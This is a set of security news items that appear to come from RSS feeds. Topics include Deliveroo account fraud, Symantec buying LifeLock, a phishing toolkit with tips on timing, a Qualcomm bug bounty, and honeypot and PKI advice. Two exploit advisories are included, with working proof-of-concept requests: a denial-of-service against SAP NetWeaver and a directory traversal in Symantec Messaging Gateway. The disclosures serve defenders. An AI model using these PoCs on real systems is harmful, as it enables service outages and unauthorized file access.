Sidney Gross

BBC Watchdog (a consumer protection television program) is today airing a report on 'food fraud' against the UK-based Deliveroo service. Food is ordered via the Deliveroo iOS or Android apps, and delivered to the customer. It appears, however, that scores of customers have recently been charged for food they didn't order; food that was actually delivered to complete strangers.

Deliveroo is adamant that it has not suffered a breach, and that no card details or other personal information has been stolen. "We are aware of these cases raised by Watchdog - they involve stolen food, not credit card numbers," it said in a statement. "These issues occur when criminals use a password stolen from another service unrelated to our company in a major data breach." Deliveroo is reimbursing the customers.

If Deliveroo is correct in this statement, it raises several other issues. Firstly, yes and obviously, users need to start practicing better password hygiene. Secondly, Deliveroo needs to improve its security in terms of fraud detection and customer authentication. Thirdly, it is not immediately apparent how the fraudster benefits from this fraud.

The reaction from most security vendors is simple. Single factor password authentication is no longer adequate. Users should have unique strong passwords for every service they use, while vendors should implement and insist on multi-factor authentication. It seems clear that multi-factor authentication (MFA) hasn't been implemented because Deliveroo has sought a frictionless experience for its users. Furthering this frictionless approach, Deliveroo maintains the customers' card details to allow easily repeatable orders -- but does not require the 3-digit security number when taking new orders.

This fits in with the idea that the fraudster/s used credentials obtained from other hacks and released on the internet -- that is all they would need. Kaspersky Lab's David Emm comments, "Businesses must ensure they implement two-factor authentication, so that credentials stolen from another site would not be sufficient for an attacker to get access to their customers' accounts." 

F-Secure's Sean Sullivan agrees. "An app such as this probably really requires that the app vendor requests the account holder's phone number -- and then sends an SMS with a code in order to activate the app. If all it relies on is a password… then any old fraudster will be able to exploit the system for free food. If a second factor of some sort is used during setup, it limits the risk. But that's the thing… start-ups want to be 'frictionless' to setup. So, Deliveroo will just have to eat the costs, if it can."

But you can have frictionless MFA with modern smartphones using, for example, facial recognition.

It is difficult at this point to know whether Deliveroo has adequate fraud prevention systems simply because there is insufficient information yet. But it seems unlikely.

The BBC reports, "User Judith MacFadyen, from Reading, told Watchdog: 'I noticed that I had a 'thank you' email from Deliveroo for a burger joint in Chiswick. I thought that was really odd so I went on to my account and had a look and there had been four orders that afternoon to a couple of addresses in London.'" Four separate orders on one account to two addresses in one afternoon should really trip warning flags.

The third puzzle is how does the fraudster benefit from food delivered to different parts of the country? Three locations are mentioned by the BBC; London, Reading and Manchester. Manchester and London are 200 miles apart. It could still be simple food fraud. Sullivan explains, "All the fraudster needs to do is to have the food delivered to a public address such as a coworking space. Or even just the front of some building -- the app lets you track the delivery -- so the fraudster would know when to step forward to claim the order. The delivery person isn't going to be able to vet the person picking up the food is actually the legitimate account holder. They'll just hand over the food to the person who knows the order ID."

But multiple orders in one afternoon and such diverse delivery locations suggest it could equally be something different. ESET Senior Research Fellow David Harley commented, "I wouldn’t be surprised if it did turn out to be due to the action of a person or persons targeting the company by getting food delivered to what may be randomly-selected addresses. A disgruntled employee? A competitor using information provided by a mole? A hacker for hire, or just doing it because it amuses them and they can? I don’t know, but I'll be watching future developments with interest."

view counter

Kevin Townsend is a Senior Contributor at SecurityWeek. He has been writing about high tech issues since before the birth of Microsoft. For the last 15 years he has specialized in information security; and has had many thousands of articles published in dozens of different magazines – from The Times and the Financial Times to current and long-gone computer magazines.

Previous Columns by Kevin Townsend:

Tags:


SecurityWeek RSS Feed

Symantec made its first major acquisition of the Blue Coat Systems era with a $ 2.3 billion acquisition of identity protection firm LifeLock.

The Symantec-LifeLock deal is expected to close in the first quarter of 2017; the antivirus software maker paid $ 24 a share for LifeLock, which is approximately 16 percent higher than LifeLock's closing stock price of $ 20.75. Rumors of the acquisition emerged last week with Bloomberg News reporting that Symantec, along with investment firms Permira and TPG Capital, were interested in bidding on LifeLock.

The LifeLock purchase comes just a few months after a major shakeup at Symantec. The security software giant purchased web and cloud security firm Blue Coat Systems for $ 4.65 billion in June; Blue Coat CEO Greg Clark was named as Symantec's chief executive, filling the voice left by former CEO Michael Brown, who resigned from Symantec in April.

However, the acquisition of LifeLock is a departure from Symantec's recent efforts to chart a new course beyond its legacy antivirus and consumer-focused businesses and focus on new opportunities in cloud security. Following the Blue Coat acquisition, Symantec outlined its "cloud generation" vision, which was carried over from Blue Coat's own strategy to increase its cloud security offerings and combine them with existing web and networking technology.

But in Symantec's second quarter 2017 earnings call earlier this month, Clark stated that although the consumer security business had been in decline, he felt there was still room to grow.

"We believe the market opportunity for protecting consumers is larger than what our current consumer products address today," Clark said. "As we move to further penetrate these opportunities, we expect the Consumer Security business to improve its growth trajectory as we move beyond the PC."

In a conference call Monday, Clark said LifeLock's technology will compliment Symantec's Norton consumer products and expand the scope of consumer security offerings.

"Consumers pay between 2x and 3x more for identify protection than they pay for endpoint malware protection," he said. "With this acquisition Symantec accelerates its Consumer Business' return to growth by offering a digital safety platform to protect information, devices, networks and identities of consumers."

LifeLock, which was founded in 2005, has established itself as one of the leading companies in the consumer identity protection market, but the company ran afoul of the U.S. Federal Trade Commission over the years. In 2010, the company paid $ 12 million to settle claims that it used false claims to promote its identity theft protection services. Under the 2010 settlement, LifeLock agreed to refrain from making deceptive marketing claims and promised to "take more stringent measures to safeguard the personal information they collect from customers," according to the FTC.

However, in 2015 LifeLock was forced to pay an additional $ 100 million to settle FTC contempt charges after the agency found that LifeLock had violated aspects of the 2010 settlement. Specifically, the FTC said LifeLock "failed to establish and maintain a comprehensive information security program to protect users' sensitive personal information including their social security, credit card and bank account numbers." In addition, the FTC found that LifeLock continued to engage in false advertising claims and failed to abide by the 2010 settlement's recordkeeping requirements. 

Next Steps

Learn how behavioral assessments can benefit threat detection

Read more on the most important endpoint security features for enterprises

Discover how data obfuscation techniques can protect information

PRO+

Content

Find more PRO+ content and other member only offers, here.


SearchSecurity: Security Wire Daily News

Application: SAP NetWeaver AS JAVA

Versions Affected: SAP NetWeaver AS JAVA 7.4

Vendor URL: http://SAP.com

Bug: Denial of Service

Sent: 22.04.2016

Reported: 23.04.2016

Vendor response: 23.04.2016

Date of Public Advisory: 09.08.2016

Reference: SAP Security Note 2313835

Author: Vahagn Vardanyan (ERPScan)

Description

1. ADVISORY INFORMATION

Title: [ERPSCAN-16-033] SAP NetWeaver AS JAVA icman a DoS vulnerability

Advisory ID:[ERPSCAN-16-033]

Risk: high

Advisory URL: https://erpscan.com/advisories/erpscan-16-033-sap-netweaver-java-icman-dos-vulnerability/

Date published: 11.11.2016

Vendors contacted: SAP

2. VULNERABILITY INFORMATION

Class: Denial of Service

Impact: Denial of Service

Remotely Exploitable: yes

Locally Exploitable: yes

CVSS Information

CVSS Base Score v3: 7.5 / 10

CVSS Base Vector:

AV : Attack Vector (Related exploit range) Network (N)

AC : Attack Complexity (Required attack complexity) Low (L)

PR : Privileges Required (Level of privileges needed to exploit) None (N)

UI : User Interaction (Required user participation) None (N)

S : Scope (Change in scope due to impact caused to components beyond
the vulnerable component) Unchanged (U)

C : Impact to Confidentiality None (N)

I : Impact to Integrity None (N)

A : Impact to Availability High (H)

3. VULNERABILITY DESCRIPTION

Unauthenticated attacker can make DoS attack with use P4 over HTTPS

4. VULNERABLE PACKAGES

SAP KERNEL 7.21 32-BIT

SAP KERNEL 7.21 32-BIT UNICODE

SAP KERNEL 7.21 64-BIT

SAP KERNEL 7.21 64-BIT UNICODE

SAP KERNEL 7.21 EXT 32-BIT

SAP KERNEL 7.21 EXT 32-BIT UC

SAP KERNEL 7.21 EXT 64-BIT

SAP KERNEL 7.21 EXT 64-BIT UC

SAP KERNEL 7.22 64-BIT

SAP KERNEL 7.22 64-BIT UNICODE

SAP KERNEL 7.22 EXT 64-BIT

SAP KERNEL 7.22 EXT 64-BIT UC

SAP KERNEL 7.42 64-BIT

SAP KERNEL 7.42 64-BIT UNICODE

SAP KERNEL 7.45 64-BIT

SAP KERNEL 7.45 64-BIT UNICODE

5. SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note 2313835

6. AUTHOR

Vahagn Vardanyan (ERPScan)

7. TECHNICAL DESCRIPTION

Vulnerability triggers when one sends HTTPS GET request to SAP NetWeaver P4.

PoC

```

GET https://SAP_IP:50005/sap.com~P4TunnelingApp!web/myServlet HTTP/1.1

Host: 172.16.10.65:50005

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0)
Gecko/20100101 Firefox/33.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

```

```

0:007> r

rax=0000a323260f1252 rbx=0000000025c500d0 rcx=0000000025c500d0

rdx=0000000000000001 rsi=0000000000000002 rdi=0000000000000000

rip=000000013f3af019 rsp=0000000003500d40 rbp=0000000003500e40

r8=0000000025c50400 r9=0000006c004c0002 r10=0000000003500c20

r11=00000000021b2df0 r12=0000000000000002 r13=000000013f2c0000

r14=0000000000000000 r15=0000000000000001

iopl=0 nv up ei ng nz ac po cy

cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010297

icman!P4PlugInReadHandler+0xb9:

00000001`3f3af019 8b4f04 mov ecx,dword ptr [rdi+4]
ds:00000000`00000004=????????

00000000`03500d40 00000001`3f363fb5 icman!P4PlugInReadHandler+0xb9
[d:\depot\bas2_rel\src\krn\si\ic\p4_plg.c @ 1192]

00000000`03500ec0 00000001`3f3638ea icman!IcmMplxAsyncReadDone+0x75
[d:\depot\bas2_rel\src\krn\si\ic\icxxmplx.c @ 5088]

00000000`03500f10 00000001`3f362626 icman!IcmMplxExecCall+0x36a
[d:\depot\bas2_rel\src\krn\si\ic\icxxmplx.c @ 4808]

00000000`0350fd20 00000000`74901d9f icman!IcmMplxThread+0x5f6
[d:\depot\bas2_rel\src\krn\si\ic\icxxmplx.c @ 3840]

00000000`0350fdb0 00000000`74901e3b MSVCR100!endthreadex+0x43

00000000`0350fde0 00000000`7716652d MSVCR100!endthreadex+0xdf

00000000`0350fe10 00000000`7729c541 kernel32!BaseThreadInitThunk+0xd

00000000`0350fe40 00000000`00000000 ntdll!RtlUserThreadStart+0x21

```

8. REPORT TIMELINE

Sent: 22.04.2016

Reported: 23.04.2016

Vendor response: 23.04.2016

Date of Public Advisory: 09.08.2016

9. REFERENCES

[ERPSCAN-16-033] SAP NetWeaver AS JAVA icman – DoS vulnerability

10. ABOUT ERPScan Research

ERPScan research team specializes in vulnerability research and
analysis of critical enterprise applications. It was acknowledged
multiple times by the largest software vendors like SAP, Oracle,
Microsoft, IBM, VMware, HP for discovering more than 400
vulnerabilities in their solutions (200 of them just in SAP!).

ERPScan researchers are proud of discovering new types of
vulnerabilities (TOP 10 Web Hacking Techniques 2012) and of the "The
Best Server-Side Bug" nomination at BlackHat 2013.

ERPScan experts participated as speakers, presenters, and trainers at
60+ prime international security conferences in 25+ countries across
the continents ( e.g. BlackHat, RSA, HITB) and conducted private
trainings for several Fortune 2000 companies.

ERPScan researchers carry out the EAS-SEC project that is focused on
enterprise application security awareness by issuing annual SAP
security researches.

ERPScan experts were interviewed in specialized infosec resources and
featured in major media worldwide. Among them, there are Reuters,
Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise,
Chinabyte, etc.

Our team consists of highly-qualified researchers, specialized in
various fields of cybersecurity (from web application to ICS/SCADA
systems), gathering their experience to conduct the best SAP security
research.

11. ABOUT ERPScan

ERPScan is the most respected and credible Business Application
Cybersecurity provider. Founded in 2010, the company operates globally
and enables large Oil and Gas, Financial, Retail and other
organizations to secure their mission-critical processes. Named as an
aEmerging Vendora in Security by CRN, listed among aTOP 100 SAP
Solution providersa and distinguished by 30+ other awards, ERPScan is
the leading SAP SE partner in discovering and resolving security
vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to
assist in improving the security of their latest solutions.

ERPScanas primary mission is to close the gap between technical and
business security and provide solutions for CISO's to evaluate and
secure SAP and Oracle ERP systems and business-critical applications
from both cyberattacks and internal fraud. As a rule, our clients are
large enterprises, Fortune 2000 companies and MSPs, whose requirements
are to actively monitor and manage security of vast SAP and Oracle
landscapes on a global scale.

We afollow the suna and have two hubs, located in Palo Alto and
Amsterdam, to provide threat intelligence services, continuous support
and to operate local offices and partner network spanning 20+
countries around the globe.

Adress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301

Phone: 650.798.5255

Twitter: @erpscan

Scoop-it: Business Application Security


Exploit Files ≈ Packet Storm

Kiwicon Michele Orru has released an automated phishing toolkit to help penetration testers better exploit businesses.

The well-known FortConsult hacker, better known as Antisnatchor (@antisnatchor), dropped the phishing kit at the Kiwicon hacking event in Wellington New Zealand last week, offering hackers tips to more successfully target businesses through the world's most popular attack vector.

Dubbed "PhishLulz", the Ruby-based toolkit builds on Orru's expertise in phishing. It spawns new Amazon EC2 cloud instances for each phishing campaign and combines a GUI from the PhishingFrenzy kit with the popular BeEF browser client-side attack framework for which he is a core developer.

It also sports a self-signed certificate authority, additional new phishing templates for various scenarios a hacker may encounter, and will in the future be even more powerful with automatic domain registration, for now limited to registrar NameCheap.

All told hackers using the toolkit will be able to send more convincing and much faster phishing emails from seemingly legitimate domains, be alerted immediately when login credentials are received, and send exploits and gain user target configuration information such as operating system and browser versions along with other running software via BeEF.

It also includes MailBoxBug which handles the fistful of popped email accounts that Orru says typically flows in at a rate of one a minute. It works on Office365 accounts with more support to follow.

Phishing emails developed with PhishLulz are designed to trick discerning targets. An impressive 40 percent of staff at an unnamed Australian Government agency opened Orru's phishing emails and sent him corporate VPN credentials during a previous security test engagement.

Michele Orru. Image: Darren Pauli / The Register.

Michele Orru. Image: Darren Pauli / The Register.

It took only two days for the hacker to gain domain administrator credentials after employees at the agency handed over VPN logins via Orru's phishing campaign.

"I was in Poland, and they were in Australia, so I had to send the emails at the right time," Orru told the hacking conference.

"With five minutes to run the PhishLulz VM, five minutes to start modify the template and upload the certificates you need, you're ready to go."

Orru says PhishLulz will help hackers get past the first time-sensitive hurdle of obtaining and utilising stolen credentials, saying that attackers will have perhaps an hour to exploit the dozen or so logins they receive before it is revoked by administrators.

You need to automate as much as possible and speed is key once you have access to credentials

He offered further pointers; the best times to send phishing emails are in the morning or just after lunch when staffer's wits are less sharp. Few staff can identify dots from dashes in URLs, nor do they pick .co vs .com.

Most phishing emails need to be highly customised to work, Orru says, unless the target is "dumb".

Orru, an open source advocate, invited interested hackers to contribute to the project. ®

Sponsored: Customer Identity and Access Management


The Register - Security

Qualcomm's been bitten by the bounty bug, signing on with HackerOne to offer up to US$ 15,000 for vulnerabilities in modems and processors.

The bounty covers Snapdragon 400, 615, 801, 805 808, 810, 820 and 821 processors, and its X5, X7, X12 and X16 LTE modems.

A vulnerability in any one of these would reach a long way into the wild. The Snapdragon X20, to pick one example, is in current-generation smartphones from Google, Samsung, Motorola, LG, ZTE, Sony, Asus, HTC, and HP.

Because the company has about 65 per cent of the LTE market, the Quadrooter bug that landed during Def Con in August was thought to affect up to 900 million devices.

Qualcomm's note at HackerOne gives white hats a pretty wide brief: Linux kernel code 3.14 or newer in the Android for MSM project, written by the Qualcomm Innovation Center and not in an end-of-life branch.

There are also rewards for bootloader bugs, anything that has root or system, privileges, the modem, networking firmware (Wi-Fi and Bluetooth), or the Qualcomm Secure Execution on Trustzone.

Merely crashing a process isn't enough; the bug has to then let the attacker get to code execution. ®

Sponsored: Transforming software delivery with DevOps


The Register - Security

Technology recruitment site GeekedIn has scraped 8 million GitHub profiles and left the information exposed in an unsecured MongoDB database. The backup of the database was downloaded by at least one third party, and it’s likely being traded online.

GitHub profiles scraped

Troy Hunt, the security researcher who runs the Have I been Pwned? service and whose own information is in the compromised backup file, received the file, and ultimately notified GitHub of the matter.

His analysis of the file ultimately revealed that:

  • It contains 8.2 million unique email addresses, i.e. records about 8.2 million users of GitHub, Bitbucket (another web-based hosting service for projects), and possibly other online services.
  • Most of these records contain users’ names, usernames, email address, geographic location, professional skills, years of professional experience.
  • All of this information is already online on GitHub and those other services, accessible to anybody – GeekedIn just scraped it and created its own database, access to which is offered to companies interested in finding developers – for a fee.

When contacted, GitHub said that they allow third parties scraping of their users’ data, so long as it’s only used for the same purpose for which they gave that information to GitHub.

“Using scraped information for a commercial purpose violates our privacy statement and we do not condone this kind of use,” they told Hunt.

After he finally managed to get in touch with GeekedIn, they acknowledged the incidente and promised to secure the data.

Hunt made some of this data searchable in raw format through his service, but only a little over 1 million users will be able to find it. He only included the data of those who had a publicly available email address on GitHub.

“This incident is not about any sort of security vulnerability on GitHub’s behalf, rather it relates to a trove of data from their site which was inappropriately scraped and then inadvertently exposed due to a vulnerability in another service,” he made sure to note.


Help Net Security

Honeypots provide the best way I know of to detect attackers or unauthorized snoopers inside or outside your organization.

For decades I've wondered why honeypots weren't taking off, but they finally seem to be reaching critical mass. I help a growing number of companies implement their first serious honeypots -- and the number of vendors offering honeypot products, such as Canary or KFSensor, continues to grow.

[ Also on InfoWorld: 19 open source GitHub projects for security pros. | Discover how to secure your systems with InfoWorld's Security newsletter. ]

If you're considering a honeypot deployment, here are 10 decisions you'll have to make.

1. What's the intent?

Honeypots are typically used for two primary reasons: early warning or forensic analysis. I'm a huge proponent of early-warning honeypots, where you set up one or more fake systems that would immediately indicate maliciousness if even slightly probed.

Early-warning honeypots are great at catching hackers and malware that other systems have missed. Why? Because the honeypot systems are fake -- and any single connection attempt or probe (after filtering out the normal broadcasts and other legitimate traffic) means malicious action is afoot.

The other major reason companies deploy honeypots is to help analyze malware (especially zero days) or help determine the intent of hackers.

In general, early-warning honeypots are much easier to set up and maintain than forensic analysis honeypots. With an early-warning honeypot, when you detect a probe or connection attempt, the mere connection attempt gives you the information you need, and you can follow the probe back to its origination to begin your next defense.

Forensic analysis honeypots, which can capture and isolate the malware or hacker tools, are merely the beginning of a very comprehensive analysis chain. I tell my customers to plan on allocating several days to several weeks for each analysis performed using a honeypot.

2. What to honeypot?

What your honeypots mimic is usually driven by what you think can best detect hackers earliest or best protect your "crown jewel" assets. Most honeypots mimic application servers, database servers, web servers, and credential databases such as domain controllers.

You can deploy one honeypot that mimics every possible advertising port and service in your environment or deploy several, with each one dedicated to mimicking a particular server type. Sometimes honeypots are used to mimic network devices, such as Cisco routers, wireless hubs, or security equipment. Whatever you think hackers or malware will most likely to attack is what your honeypots should emulate.

3. What interaction level?

Honeypots are classified as low, medium, or high interaction. Low-interaction honeypots only emulate listening UDP or TCP ports at their most basic level, which a port scanner might detect. But they don't allow full connections or logons. Low-interaction honeypots are great for providing early warnings of malicious behavior.

Medium-interaction honeypots offer a little bit more emulation, usually allowing a connection or logon attempt to appear successful. They may even contain basic file structures and content that could be used to fool an attacker. High-interaction honeypots usually offer complete or nearly complete copies of the servers they emulate. They're useful for forensic analysis because they often trick the hackers and malware into revealing more of their tricks.

4. Where should you place the honeypot?

In my opinion, most honeypots should be placed near the assets they are attempting to mimic. If you have a SQL server honeypot, place it in the same datacenter or IP address space where your real SQL servers live. Some honeypot enthusiasts like to place their honeypots in the DMZ, so they can receive an early warning if hackers or malware get loose in that security domain. If you have a global company, place your honeypots around the world. I even have customers who place honeypots that mimic the CEO's or other high-level C-level employees' laptops to detect if a hacker is trying to compromise those systems.

5. A real system or emulation software?

Most honeypots I deploy are fully running systems containing real operating systems -- usually old computers ready for retirement. Real systems are great for honeypots because attackers can't easily tell they're honeypots.

I also install a lot of honeypot emulation software; my longtime favorite is KFSensor. The good ones, like KFSensor, are almost "next, next, next" installs, and they often have built-in signature detection and monitoring. If you want low-risk, quick installs, and lots of features, honeypot emulation software can't be beat.

6. Open source or commercial?

There are dozens of honeypot software programs, but very few of them are supported or actively updated a year after their release. This is true for both commercial and open source software. If you find a honeypot product that's updated for longer than a year or so, you've found a gem.

Commercial products, whether new or old, are usually easier to install and use. Open source products, like Honeyd (one of the most popular programs) are usually much harder to install, but often far more configurable. Honeyd, for example, can emulate nearly 100 different operating systems and devices, down to the subversion level (Windows XP SP1 versus SP2 and so on), and it can be integrated with hundreds of other open source programs to add features.

7. Which honeypot product?

As you can tell, I'm partial to commercial products for their feature sets, ease of use, and support. In particular, I'm a fan of KFSensor. If you choose an open source product, Honeyd is great, but possibly overly complex for the first-time honeypot user. Several honeypot-related websites, such as Honeypots.net, aggregate hundreds of honeypot articles and link to honeypot software sites.

8. Who should administer the honeypot?

Honeypots are not set-and-forget it solutions -- quite the opposite. You need at least one person (if not more) to take ownership of the honeypot. That person must plan, install, configure, update, and monitor the honeypot. If you don't appoint at least one honeypot administrator, it will become neglected, useless, and at worst, a jumping-off spot for hackers.

9. How will you refresh the data?

If you deploy a high-interaction honeypot, it will need data and content to make it look real. A one-time copy of data from somewhere else isn't enough; you need to keep the content fresh.

Decide how often to update it and by what method. One of my favorite methods is to use a freely available copy program or a copy commands to replicate nonprivate data from another server of a similar type -- and initiate the copy every day using a scheduled task or cron job. Sometimes I'll rename the data during the copy so that it appears more top secret than it really is.

10. Which monitoring and alerting tools should you use?

A honeypot isn't of any value unless you enable monitoring for malicious activity -- and set up alerts when threat events occur. Generally, you'll want to use whatever methods and tools your organization routinely uses for this. But be warned: Deciding what to monitor and alert on is often the most time-consuming part of any honeypot planning cycle.


InfoWorld Security Adviser

Here’s an overview of some of last week’s most interesting news and articles:

Yahoo breach was not state-sponsored, researchers claim
The massive 2014 Yahoo breach isn’t the work of state-sponsored hackers as the company has claimed to believe, say researchers from identity protection and threat intelligence firm InfoArmor. Instead, the breach was effected by a group of professional blackhats believed to be from Eastern Europe.

The psychological reasons behind risky password practices
A Lab42 survey highlights the psychology around why consumers develop poor password habits despite understanding the obvious risk, and suggests that there is a level of cognitive dissonance around our online habits.

Mobile security stripped bare: Why we need to start again
There are three main threat vectors for mobile devices: targeting and intercepting the communications to and from devices; targeting the devices’ external interfaces (Cellular, WiFI, Bluetooth, USB, NFC, Web etc.) for the purpose of device penetration and planting malicious code; and targeting the data on the device and the resources/functions the device/underlying OS provides access to such as microphone, camera, GPS, etc.

ICS-CERT releases new tools for securing industrial control systems
The Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) has published newer versions of two tools that can help administrators with securing industrial control systems: the Cyber Security Evaluation Tool (CSET), and a whitepaper on recommended practices for improving ICS cybersecurity with defense-in-depth strategies.

OS analysis tool osquery finally available for Windows
Nearly two years after Facebook open sourced osquery, the social networking giant has made available an osquery developer kit for Windows, allowing security teams to build customized solutions for Windows networks.

DefecTor: DNS-enhanced correlation attacks against Tor users
A group of researchers from Princeton University, Karlstad University and KTH Royal Institute of Technology have devised two new correlation attacks that can be leveraged to deanonymize Tor users.

Incident response survival guide
Here are some steps that will allow organizations to minimize the damage when a security breach occurs.

D-Link DWR-932 router is chock-full of security holes
Security researcher Pierre Kim has unearthed a bucketload of vulnerabilities affecting the LTE router/portable wireless hotspot D-Link DWR-932. Among these are backdoor accounts, weak default PINs, and hardcoded passwords.

Enhance iMessage security using Confide
One of the new features in iOS 10 offers the possibility of deploying specially crafted applications within iMessage. Most users will probably (ab)use this new functionality for sending tiresome animations and gestures, but some applications can actually provide added value for iMessage communication.

Why digital hoarding poses serious financial and security risks
82 percent of IT decision makers admit they are hoarders of data and digital files. These include: unencrypted personal records, job applications to other companies, unencrypted company secrets and embarrassing employee correspondence.

Clear and present danger: Combating the email threat landscape
As long as organisations use email to send and receive files, malicious email attachments will continue to plague corporate inboxes.

Europol identifies eight main cybercrime trends
A significant proportion of cybercrime activity still involves the continuous recycling of relatively old techniques, security solutions for which are available but not widely adopted.

Microsoft equips Edge with hardware-based container
Windows Defender Application Guard is a lightweight virtual machine that prevents malicious activity coming from the web from reaching the operating system, apps, data, and the enterprise network.

Rise of the drones: Managing a new risk environment
More drones in the skies raise a number of new safety concerns, ranging from collisions and crashes to cyber-attacks and terrorism.

Swiss voters approve new surveillance law
The Swiss Federal Intelligence Service will now be able to bug private property, phone lines, and wiretap computers (under certain conditions).

IoT-based DDoS attacks on the rise
As attackers are now highly aware of insufficient IoT security, many pre-program their malware with commonly used and default passwords, allowing them to easily hijack IoT devices. Poor security on many IoT devices makes them easy targets, and often victims may not even know they have been infected.

Public safety threat: Cyber attacks targeting smart city services
A new survey conducted by Dimensional Research assessed cyber security challenges associated with smart city technologies.


Help Net Security

My organization is exploring the idea of implementing our own public key infrastructure. What are the benefits...

of having our own internal PKI -- especially in terms of costs and management?

It's quite common for large enterprises to run their own public key infrastructure (PKI), acting as an internal certificate authority (CA) and installing their own root certificate in the trust stores of all the company's devices. The main benefit of having internal PKI is that internal services can be configured to only accept certificates from the enterprise's own CA chain, in theory making it harder for hackers to impersonate genuine users. Digital certificates are a vital part of PKI security technologies like signed and encrypted email, signed documents, VPN access and SSL authentication because they provide a means to establish the ownership of an encryption key. The other benefit is that self-issued certificates are free, and that it's a solution that scales well. However, reality is somewhat different.

Microsoft Certificate Services, for example, provides all the software and programs needed to run an internal PKI, and is included with Windows enterprise servers. The root certificate can also be distributed to all domain-connected objects based on group policies. However, adding it to the trusted store of every version of every app on every machine is a lot more challenging. The certificates themselves may be free, but the resources required to securely manage internal PKI have to be factored into the overall cost. Not that many enterprises have internal IT staff who are qualified and capable of properly managing and securing a PKI in accordance with standards like CA/Browser Forum Baseline Requirements Certificate Policy for the Issuance and Management of Publicly-Trusted Certificates, or the Mozilla CA Certificate Policy.

The security and integrity of the root signing keys are critical and require physical as well as logical security controls to be deployed. The mission-critical nature of a PKI means enterprises must be able to provide a constant quality of service, and perform specialist tasks required in certificate lifecycle management and validation services, such as renewing certificates, maintaining and updating certificate revocation lists and running online certificate status protocol services.

Before deciding to implement internal PKI, carefully weigh the costs of the necessary hardware, staff and infrastructure against the costs of outsourcing. An in-house CA is only really useful for internal corporate use, as its certificates won't be trusted by devices and services outside of the organization. Internet-facing servers will still need a certificate from a publicly recognized CA. Most public CAs specializing in outsourcing now offer Active Directory integration and cost-effective certificate options for internal purposes, eliminating the hassle of managing an internal CA, while offering technical expertise and the latest in security technologies.

Ask the Expert: Want to ask Michael Cobb a question about application security? Submit your questions now via email. (All questions are anonymous.)

Next Steps

Find out how to address challenges in AWS Active Directory integration

Read about the fragmentation of common PKI approaches

Learn if the eDellRoot certificate vulnerability points to a larger problem

This was last published in September 2016

PRO+

Content

Find more PRO+ content and other member only offers, here.


SearchSecurity: Security Wire Daily News

# Title : Symantec Messaging Gateway <= 10.6.1 Directory Traversal
# Date : 28/09/2016
# Author : R-73eN
# Tested on : Symantec Messaging Gateway 10.6.1 (Latest)
# Software : https://www.symantec.com/products/threat-protection/messaging-gateway
# Vendor : Symantec
# CVE : CVE-2016-5312
# Vendor Advisory and Fix: https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160927_00
#
# ___ __ ____ _ _
# |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | |
# | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | |
# | || | | | _| (_) | |_| | __/ | | | / ___ \| |___
# |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|
#
#
# DESCRIPTION:
#
# A charting component in the Symantec Messaging Gateway control center does not properly sanitize user input submitted for charting requests.
# This could potentially result in an authorized but less privileged user gaining access to paths outside the authorized directory.
# This could potentially provide read access to some files/directories on the server for which the user is not authorized.
#
The problem relies in the package kavachart-kcServlet-5.3.2.jar , File : com/ve/kavachart/servlet/ChartStream.java
The vulnerable code is
extends HttpServlet {
public void doGet(HttpServletRequest httpServletRequest, HttpServletResponse httpServletResponse) {
block6 : {
try {
String string = httpServletRequest.getParameter("sn");
//**** Taking parameter "sn" and writing it to the "string variable"

if (string == null) break block6;
String string2 = string.substring(string.length() - 3);

byte[] arrby = (byte[])this.getServletContext().getAttribute(string);

//**** The string variable is passed here without any sanitanization for directory traversal
//**** and you can successfully use this to do a directory traversal.

if (arrby != null)
httpServletResponse.setContentType("image/" + string2);
ServletOutputStream servletOutputStream = httpServletResponse.getOutputStream();
httpServletResponse.setContentLength(arrby.length);
servletOutputStream.write(arrby);
this.getServletContext().removeAttribute(string);
break block6;

POC:
https://IP-address:PORT/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/lib


Exploit Files ≈ Packet Storm